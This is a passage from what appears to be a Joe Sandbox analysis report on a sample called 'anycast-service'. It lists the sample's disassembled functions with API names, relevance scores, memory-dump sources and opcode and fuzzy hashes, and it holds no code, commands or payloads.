                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast$ControlDevice
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3319937403-0
                                                                                                                              • Opcode ID: 0bfd0310889e5f7a9fc90f479a807c0084e658a885ff9adef3de91960cd76478
                                                                                                                              • Instruction ID: 8bf2fd59050b32cd733f570d0d6171a4d578817ee20559e191e44cadcdb7c898
                                                                                                                              • Opcode Fuzzy Hash: 0bfd0310889e5f7a9fc90f479a807c0084e658a885ff9adef3de91960cd76478
                                                                                                                              • Instruction Fuzzy Hash: 36115271A48B4187EF448B76A45807973A1FB8C7E5F448432EA4E823A0DF7CD89BC714
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8014740 Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast$ControlDevice
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3319937403-0
                                                                                                                              • Opcode ID: fd17de2331ba838f14324f7fa5d7aacf25473bf3066d66e9adef63e3b0141b28
                                                                                                                              • Instruction ID: c21c78b2dccf6347292b428f1e76c1ef43c4f0eec3ef364fbe51a8dfeae5aba8
                                                                                                                              • Opcode Fuzzy Hash: fd17de2331ba838f14324f7fa5d7aacf25473bf3066d66e9adef63e3b0141b28
                                                                                                                              • Instruction Fuzzy Hash: CA117071A48B4187EF009B7AA45807972A0FB8C7D6F444432EA4E827A0DF7CD89B8714
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8F83630 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 192COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144436344.00007FF8B8F81000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8B8F80000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2144384652.00007FF8B8F80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144475077.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147309599.00007FF8B8F94000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F95000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F97000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8f80000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: abort$CallEncodePointerTranslator
                                                                                                                              • String ID: MOC$RCC
                                                                                                                              • API String ID: 2889003569-2084237596
                                                                                                                              • Opcode ID: d92a63c91bd30e80895aa5f1b268d8c401b61b05fa384984e1c8145e181b8fe5
                                                                                                                              • Instruction ID: 67a71e95ae69cb50e50f7de2133a7a74ac508af0eed8f82ef086f0e7b796ec90
                                                                                                                              • Opcode Fuzzy Hash: d92a63c91bd30e80895aa5f1b268d8c401b61b05fa384984e1c8145e181b8fe5
                                                                                                                              • Instruction Fuzzy Hash: 66919073A08785CAE710CB69E8406AD7BA0F7447C9F24412AEF8D57766DF38D196C704
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8F8B1FC Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 156COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144436344.00007FF8B8F81000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8B8F80000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2144384652.00007FF8B8F80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144475077.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147309599.00007FF8B8F94000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F95000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F97000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8f80000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Name::operator+
                                                                                                                              • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                                                                                                                              • API String ID: 2943138195-757766384
                                                                                                                              • Opcode ID: 241fe8369575fd16c565f570e310f17d36e5eb163866183d1eea3fec2ca4242b
                                                                                                                              • Instruction ID: 7398c659bbabc709aaeb09f2e4f7e8d9fed8eebe50abde4bd2bfa9ec95e23a0e
                                                                                                                              • Opcode Fuzzy Hash: 241fe8369575fd16c565f570e310f17d36e5eb163866183d1eea3fec2ca4242b
                                                                                                                              • Instruction Fuzzy Hash: A9716771E08A02D4FB118F6DD8509BC26A4BB157C6F844539DB4D53BAADF3CE2A28358
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8017EE4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 152COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                              • String ID: csm$f
                                                                                                                              • API String ID: 2395640692-629598281
                                                                                                                              • Opcode ID: 6bee771a020cdff4a80aed4f2d9a489c15913014da4646aea749ce0df83d1089
                                                                                                                              • Instruction ID: ead58f90dfef9b8b25b674861e89d4babba669cdfb3506766d139c89fb2c7518
                                                                                                                              • Opcode Fuzzy Hash: 6bee771a020cdff4a80aed4f2d9a489c15913014da4646aea749ce0df83d1089
                                                                                                                              • Instruction Fuzzy Hash: B351AD32A19655C6EB55EF2AE404A2A7391FB04BE8F114134FB5A437C8DF39E9438748
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8F8341C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 142COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00007FF8B8F86470: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8B8F820FE), ref: 00007FF8B8F8647E
                                                                                                                              • EncodePointer.KERNEL32(?,?,?,?,00000000,00000000,?,?,?,?,00007FF8B8F82EBF), ref: 00007FF8B8F8346F
                                                                                                                              • _CallSETranslator.LIBVCRUNTIME ref: 00007FF8B8F834B4
                                                                                                                              • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,00000000,?,?,?,?,00007FF8B8F82EBF), ref: 00007FF8B8F83627
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144436344.00007FF8B8F81000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8B8F80000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2144384652.00007FF8B8F80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144475077.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147309599.00007FF8B8F94000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F95000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F97000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8f80000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: abort$CallEncodePointerTranslator
                                                                                                                              • String ID: MOC$RCC
                                                                                                                              • API String ID: 2889003569-2084237596
                                                                                                                              • Opcode ID: 557ab9b851f5152bc0c2750d886cfe1a2e568b727b799ba355aaa441886be79f
                                                                                                                              • Instruction ID: a51ee353d60f09de3ea6eed3e9559a0b87efebb56bd86fe89264b5f0d228d3a6
                                                                                                                              • Opcode Fuzzy Hash: 557ab9b851f5152bc0c2750d886cfe1a2e568b727b799ba355aaa441886be79f
                                                                                                                              • Instruction Fuzzy Hash: 48514832A08A85CAEB20DF69D480BAD77A0FB44BC9F144525EF4D17B6ADF38E056C704
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8F85280 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 132COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144436344.00007FF8B8F81000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8B8F80000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2144384652.00007FF8B8F80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144475077.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147309599.00007FF8B8F94000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F95000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F97000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8f80000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileHeader
                                                                                                                              • String ID: MOC$RCC$csm$csm
                                                                                                                              • API String ID: 104395404-1441736206
                                                                                                                              • Opcode ID: ded548473836ec8dd6431ac80ac2dc839a4268a69abcc4f52073c7a3c4210d4e
                                                                                                                              • Instruction ID: 013a00f86d6168d16998db441eeb19f8dec8ec00fa316ccd183effc4006d9707
                                                                                                                              • Opcode Fuzzy Hash: ded548473836ec8dd6431ac80ac2dc839a4268a69abcc4f52073c7a3c4210d4e
                                                                                                                              • Instruction Fuzzy Hash: 02517B72919602C6EB609F29D451B6D26A1FB89BD6F140131EB4C43797EF3CE493C609
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8014990 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast$ControlDevice
                                                                                                                              • String ID: Lh!
                                                                                                                              • API String ID: 3319937403-1737251911
                                                                                                                              • Opcode ID: 8880a44eda61f59d9a5a4e7dd0178967561377a1a5d71dde0deb9921124f8abb
                                                                                                                              • Instruction ID: 50f20a2ecf10147e5a434b704cca8ec5f485ed59b08b0946f38602ab40e04198
                                                                                                                              • Opcode Fuzzy Hash: 8880a44eda61f59d9a5a4e7dd0178967561377a1a5d71dde0deb9921124f8abb
                                                                                                                              • Instruction Fuzzy Hash: C2119EB2A18A80C3EB148B69E45466E73E2FB88BD4F449031E74947B68DFBCD457CB04
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8014C40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast$ControlDevice
                                                                                                                              • String ID: $h!
                                                                                                                              • API String ID: 3319937403-558417631
                                                                                                                              • Opcode ID: 0a75b3a2bff21700731ae706e1c872c63389c82060dfc142bc57e082aa187bd6
                                                                                                                              • Instruction ID: a2b8356c7287b0fd87ef34b387489c943a1afafc04f80d8ca10ea05ebeee5892
                                                                                                                              • Opcode Fuzzy Hash: 0a75b3a2bff21700731ae706e1c872c63389c82060dfc142bc57e082aa187bd6
                                                                                                                              • Instruction Fuzzy Hash: 37015E32A09B81C3DB508B69A49006A73E5FB887D5F044035E78E03764DF7CD9AB8B04
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8014550 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast$ControlDevice
                                                                                                                              • String ID: 8h!
                                                                                                                              • API String ID: 3319937403-880057547
                                                                                                                              • Opcode ID: 2fe726e28531951eaf6c8364779d5b6ad99d86eae39940e74dd4533f41e86f19
                                                                                                                              • Instruction ID: d1b77eb1948cb3d2b0cba7c06bfce57cad8549594e11520422eb76b5cce09a72
                                                                                                                              • Opcode Fuzzy Hash: 2fe726e28531951eaf6c8364779d5b6ad99d86eae39940e74dd4533f41e86f19
                                                                                                                              • Instruction Fuzzy Hash: ED014B72A48B81C6DB04DB25E44416AB3B1FB8C7D4F944136E78D42B68CF3CD45ACB04
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8014910 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast$ControlDevice
                                                                                                                              • String ID: Hh!
                                                                                                                              • API String ID: 3319937403-1619391643
                                                                                                                              • Opcode ID: 1f0f28e4dba88e331fa7368ecbe8021faac3e0ab32d695a3cb8708f0bbe7a234
                                                                                                                              • Instruction ID: b2863c22a9c10ffaa93e26cfac0f8234c0ba028e49ab767e253f5f78aefb3ce4
                                                                                                                              • Opcode Fuzzy Hash: 1f0f28e4dba88e331fa7368ecbe8021faac3e0ab32d695a3cb8708f0bbe7a234
                                                                                                                              • Instruction Fuzzy Hash: 67F019B2A08B81C6DB149B65E4441AAB3F1FB8C7D4F944136E78D42BA8CF7CC55ACB04
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8014890 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast$ControlDevice
                                                                                                                              • String ID: @h!
                                                                                                                              • API String ID: 3319937403-1855366435
                                                                                                                              • Opcode ID: e350a49fa78cafc70148128d9ea642fc7380ff2a3dd1e3a147f4f25d0eeb235f
                                                                                                                              • Instruction ID: 391353ced106b47088f5db4dfe566f450b813e284a73bfabd2ee58d2fc048eea
                                                                                                                              • Opcode Fuzzy Hash: e350a49fa78cafc70148128d9ea642fc7380ff2a3dd1e3a147f4f25d0eeb235f
                                                                                                                              • Instruction Fuzzy Hash: 10F01972A08B81C6DB149B65E4441AAB3F1FB8C7D4F944136E78D42BA8CF7CC55ACB04
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B80241D4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                              • Opcode ID: 33cded4ec455d71caff5b8e73c341167b8a152280a0af3a9229123fb6019fc30
                                                                                                                              • Instruction ID: 4be1a23807581890ae7ebcc9231b5e2f5a46cec22a93d26dcb8c251ef6f1862f
                                                                                                                              • Opcode Fuzzy Hash: 33cded4ec455d71caff5b8e73c341167b8a152280a0af3a9229123fb6019fc30
                                                                                                                              • Instruction Fuzzy Hash: 2FF03A61B59A0281EF448B6AE4843792360AF4C7C1F441435EB4F865E1DF7CD49BC308
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B802E5F0 Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF8B802E632
                                                                                                                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF8B802E5AF,?,?,?,00007FF8B802AACB), ref: 00007FF8B802E6F0
                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF8B802E5AF,?,?,?,00007FF8B802AACB), ref: 00007FF8B802E77A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2210144848-0
                                                                                                                              • Opcode ID: 828d55d71199dd17ea757fdc25d563b14f54bca258e63876f329d7464df69192
                                                                                                                              • Instruction ID: f9250ab3bad4972adf40f1f68c7e056e3a3098398cbb86cba5ade4886e85405d
                                                                                                                              • Opcode Fuzzy Hash: 828d55d71199dd17ea757fdc25d563b14f54bca258e63876f329d7464df69192
                                                                                                                              • Instruction Fuzzy Hash: 8B819C32E5861289FF509F6988406BD67A0AF69BD8F840135DF0E637D2DFB8A447C318
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8014CD0 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast$ControlDevice
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3319937403-0
                                                                                                                              • Opcode ID: 5d84ee093293e78c87def55bcb602bc6977e17482d3c951a71c96d08cbb9ded2
                                                                                                                              • Instruction ID: f9f88a64107487abd4a50706d9c177927363b72cdf625f18f588413fa7ee9a42
                                                                                                                              • Opcode Fuzzy Hash: 5d84ee093293e78c87def55bcb602bc6977e17482d3c951a71c96d08cbb9ded2
                                                                                                                              • Instruction Fuzzy Hash: 5A213936608B81C6EB509B69E45016AB7B1FB987E4F900036E78D83BA9DF7CD447CB04
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B802F7F8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _set_statfp
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1156100317-0
                                                                                                                              • Opcode ID: 653bb921f2f61cac03e215ed7f57f66b21811514ef7dbbbb3b987cd90a740ecc
                                                                                                                              • Instruction ID: 1a7998b8b8d07e858b1097d4fcdb5b08f1caad2465346045d4c2574dc92145d1
                                                                                                                              • Opcode Fuzzy Hash: 653bb921f2f61cac03e215ed7f57f66b21811514ef7dbbbb3b987cd90a740ecc
                                                                                                                              • Instruction Fuzzy Hash: 2B118CA2E58A0701FE78192DE49677DA1406F583E4F480634EB6E1A7D78FBCA9434248
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B80142E0 Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
